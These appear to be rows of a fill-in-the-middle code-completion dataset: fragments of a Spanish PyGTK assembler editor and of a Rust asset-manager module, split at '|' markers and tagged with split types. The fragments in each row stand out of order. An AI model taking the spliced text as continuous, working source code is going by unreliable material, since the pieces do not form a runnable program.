self.window.set_default_size(400,300) #(base,altura)
self.window.set_resizable(True)
self.window.connect("delete_event",self.delete_event)
# crear, empaquetar y conectar señales de la vBox
self.vBox = gtk.VBox(gtk.FALSE,0) # crear una caja vertical para empaquetar widgets
self.window.add(self.vBox) # empaquetar vBox en la ventana
# crear un item para menu (boton "Archivo")
self.menu_item_file = gtk.MenuItem("_Archivo")
# crear menu y empaquetar en la barra de menu
self.menu_bar = gtk.MenuBar() # se crea objeto del tipo MenuBar
self.menu_bar.append(self.menu_item_file)
self.vBox.pack_start(self.menu_bar,gtk.FALSE,gtk.FALSE,0) # empaquetar la barra en vBox
# insertar items al item "archivo"
self.menu = gtk.Menu()
self.menu_item = gtk.MenuItem("Abrir _archivo...")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.open_file)
self.menu_item_file.set_submenu(self.menu)
self.menu_item = gtk.MenuItem("_Guardar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.save_file)
self.menu_item = gtk.MenuItem("_Cerrar")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.close)
self.menu_separator = gtk.SeparatorMenuItem() # crear un separador para un menu
self.menu.append(self.menu_separator) # insertar separador en el menu
self.menu_item = gtk.MenuItem("_Salir")
self.menu.append(self.menu_item)
self.menu_item.connect("activate",self.delete_event)
# crear, empaquetar en vBox una hBox para los botones (barra superior)
self.hBox_botones = gtk.HBox(gtk.FALSE,0) # crear caja Horizontal para botones
self.vBox.pack_start(self.hBox_botones,gtk.FALSE,gtk.FALSE,0) #meter caja de botones a vBox
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "run",
# conectar señal "clicked" al método run
self.compile_button = gtk.Button("run") # crear boton con etiqueta "run"
self.hBox_botones.pack_start(self.compile_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hBox
self.compile_button.connect("clicked",self.run) #conectar la señal clicked al método run
# crear, empaquetar en hBox_botones (barra superior) un boton con etiqueta "examinar" en el dialogo
self.file_chooser_button = gtk.Button("Examinar")
self.file_chooser_button.connect("clicked",self.open_file)
self.hBox_botones.pack_end(self.file_chooser_button,gtk.FALSE,gtk.FALSE,0) # meter boton en hbox
# crear un buffer para el TextView (text_area)
self.text_buffer = gtk.TextBuffer()
# crear, empaquetar eh vBox un area de texto (gtk.TextView)
self.text_area = gtk.TextView(self.text_buffer)
# añadir scroll al textView (text_area)
self.scroll_text = gtk.ScrolledWindow()
self.scroll_text.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.scroll_text.add(self.text_area)
# se insertó el area de edición de texto a una ventana con scroll, por lo que no se empaqueta en una Vbox,
# se empaqueta la ventana con scroll en la Vbox (la misma ventana contiene el area de edición de texto) -> por si no lo leíste antes
self.vBox.pack_start(self.scroll_text)
# mostrar todos los elementos de la ventana inclusive.
self.window.show_all()
#crear diccionario al crear la ventana
self.tabop = Tabop()
#crear un contador de localidades al crear ventana
self.contloc = Contloc()
def open_file(self,widget,data=None): # método llamado desde el menu "archivo -> Abrir archivo..."
print "opening file..."
dialog = gtk.FileChooserDialog("Examinar",self.window,gtk.FILE_CHOOSER_ACTION_OPEN,buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
filter = gtk.FileFilter() # para crear el filtro de archivo en la ventana de dialogo
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
self.file = open(self.namefile,'r+')
self.text_in_buffer = self.file.read()
self.text_buffer.set_text(self.text_in_buffer)
print self.text_buffer.get_line_count(), 'lineas leídas'
self.file.close()
print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'No file selected...'
dialog.destroy()
def save_file(self,widget,data=None):
# se crean los iteradores para marcar el inicio y final del buffer, para guardar el archivo
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
try:
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
except AttributeError:
print "saving a new file"
dialog = gtk.FileChooserDialog("Guardar como...",self.window,
gtk.FILE_CHOOSER_ACTION_SAVE,
buttons= (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
filter = gtk.FileFilter()
filter.set_name("Archivo Ensamblador (*.asm)")
filter.add_pattern("*.asm")
filter.add_mime_type("text/txt")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.namefile = dialog.get_filename()
# si al nombrar archivo el usuario no colocó extensión *.asm se le añade
if self.namefile.find(".asm") == -1:
self.namefile+=".asm"
self.file = open(self.namefile,'w+')
self.file.write(self.text_buffer.get_text(file_start,file_end))
self.file.close()
elif response == gtk.RESPONSE_CANCEL:
print "aborting save..."
dialog.destroy()
# se guardaron cambios y la bandera de modificación se apaga
self.text_buffer.set_modified(False)
| file_end = self.text_buffer.get_end_iter()
cont = self.text_buffer.get_text(file_start,file_end)
if self.text_buffer.get_modified():
message = "El Archivo ha sido modificado\n¿Desea guardar cambios?"
result_dialog = gtk.MessageDialog(self.window, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_QUESTION, gtk.BUTTONS_YES_NO, message)
result_dialog.set_title("Cerrar...")
#result_dialog.show_all()
response = result_dialog.run() # se lanza dialogo para salvar cambios
if response == gtk.RESPONSE_YES:
self.save_file(None)
gtk.main_quit()
def delete_event(self,widget,data=None): # método llamado a presionar boton cerrar
print "El programa se cerrará..."
gtk.main_quit()
def resultDialog(self,messageArray):
result_dialog = gtk.Dialog("Resultados de compilación",self.window,buttons=(gtk.STOCK_OK, gtk.RESPONSE_OK))
result_dialog.set_size_request(300, 300)
box = result_dialog.get_content_area()
scrolled_win = gtk.ScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
string = ""
for i in messageArray:
string = string+i+"\n\n"
label = gtk.Label(string)
label.set_selectable(True)
scrolled_win.add_with_viewport(label)
box.add(scrolled_win)
result_dialog.show_all()
response = result_dialog.run()
if response == gtk.RESPONSE_OK:
result_dialog.destroy()
def run(self,widget,data=None):
objectLine = [] # se crea un arreglo para los objetos "linea"
print "Se presionó el botón run, aquí comienza la compilación del ensamblador"
file_start = self.text_buffer.get_start_iter()
file_end = self.text_buffer.get_end_iter()
self.code_in_buffer = self.text_buffer.get_text(file_start,file_end)
if self.code_in_buffer=="":
return
line = self.code_in_buffer.split('\n')
archivolist = str(self.namefile)
archivolist = archivolist[:-4] #quito extensión .asm
self.tbs = open(archivolist+".tbs",'w+') #creat archivo *.tbs (tabla de símbolos)
j = 0 #contador para aumentar el número de la línea a escribir en *.lst
# se crea una lista de objetos tipo Linea
for i in range(len(line)):
objectLine.append(Linea(line[i],i+1))
# creo un array para los mensajes de los objetos linea analizados
messageArray = []
lstArray = [] #creo lista para escribir en el archivo *.lst
post_processing = [] # lista de lineas que tienen una etiqueta como operando, se procesan después del *.tbs
dict_tbs = {} #diccionario con las etiquetas que existen en el *.tbs
n = 0 #número a sumar en el contloc
for i in objectLine:
if i.toString() != None:
#envío el tabop para que toString revise si existe la instrucción
messageArray.append(i.toString(self.tabop))
#se define el inicio del contador de localidades
self.contloc.add(n)
if i.get_opcode() == "ORG":
opr = i.get_operator()
val = self.get_dec(opr)
self.contloc.set_contloc(val)
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
n = 0
# if(es un código de operación)
if self.tabop.tabop.has_key(i.get_opcode()):
n=i.get_totalbytes()
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
if i.get_operator()!=None:
# si el operando es una etiqueta, se añade a la cola de post-procesamiento (*.tbs stuffs :v)
if i.check_label(cad = i.get_operator()):
#linea -1 para saber en que indice de lstArray meterlo después (inicia en 0)
post_processing.append([i,i.line_number-1,self.contloc.get_format()])
else: # no es una etiqueta, entonces se añade sin pex :v
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
else:
lstArray.append(self.contloc.get_format()+"\t"+i.get_machinecode(self.tabop)+"\t\t"+line[j]+"\n")
if i.get_label()!=None:
self.tbs.write(i.get_label()+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
if i.get_opcode() == "EQU":
opr = i.get_operator()
val = self.get_dec(opr)
n = 0
i.set_val_contloc(self.contloc.fotmatEqu(val))
messageArray[-1]+="\nContloc: "+self.contloc.fotmatEqu(val)
lstArray.append(self.contloc.fotmatEqu(val)+"\t\t\t"+line[j]+"\n")
self.tbs.write(i.get_label()+"\t"+self.contloc.fotmatEqu(val)+"\n")
dict_tbs[i.get_label()] = self.contloc.fotmatEqu(val)
if i.get_opcode() == "END":
i.set_val_contloc(self.contloc.get_format())
messageArray[-1]+="\nContloc: "+self.contloc.get_format()
lstArray.append(self.contloc.get_format()+"\t\t\t"+line[j]+"\n")
if i.get_label() != None:
self.tbs.write(str(i.get_label())+"\t"+self.contloc.get_format()+"\n")
dict_tbs[i.get_label()] = self.contloc.get_format()
break; # si es un END, termina de analizar el código
j+=1 # se aumenta la linea a escribir en el *.lst
else:
j+=1 # se aumenta la linea a escribir en el *.lst
continue
#cierro archivos creados al correr el código
self.tbs.close()
#se procesan las lineas con etiquetas (que están en post_processing
for i in post_processing:
if dict_tbs.has_key (i[0].get_operator()):
lstArray.insert(i[1], (i[2]+"\t"+i[0].get_machinecode(self.tabop,dict_tbs)+"\t\t"+line[i[1]]+"\n"))
else:
lstArray.insert(i[1],"Algo raro pasó, la etiqueta no está en el tbs\n")
self.lst = open(archivolist+".lst",'w+') #crear archivo *.lst
for line in lstArray:
self.lst.write(line)
self.lst.close()
# se llama método para mostrar en un Dialogo los resultados
self.resultDialog(messageArray)
def get_dec(self,opr):
"""método para obtener valor decimal de un ORG"""
if opr[0]=='$':
opr = opr[1:] # se le quita el '$'
valdec = int(opr,16) # str(hex) -> dec
elif opr[0]=='%':
opr = opr[1:] # se le quita el '%'
valdec = int(opr,2) # str(bin) -> dec
elif opr[0]=='@':
opr = opr[1:] # se le quita el '@'
valdec = int(opr,8) # str(oct) -> dec
else: #se infiere que es decimal
valdec = int(opr,10) # str(dec) -> dec
return valdec
def main(self):
gtk.main()
if __name__ == "__main__":
ventana = Ventana("Taller de programación de sistemas") # crear un objeto ventana con el titulo fijo
ventana.main() # llamar al iniciar la ventana | def close(self,widget,data=None): # método llamado desde el menu "archivo -> cerrar"
print "Ctrl + W"
file_start = self.text_buffer.get_start_iter() | random_line_split |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
} | ))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
} | }
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?, | random_line_split |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct | <A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
}
| Manager | identifier_name |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading) | else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
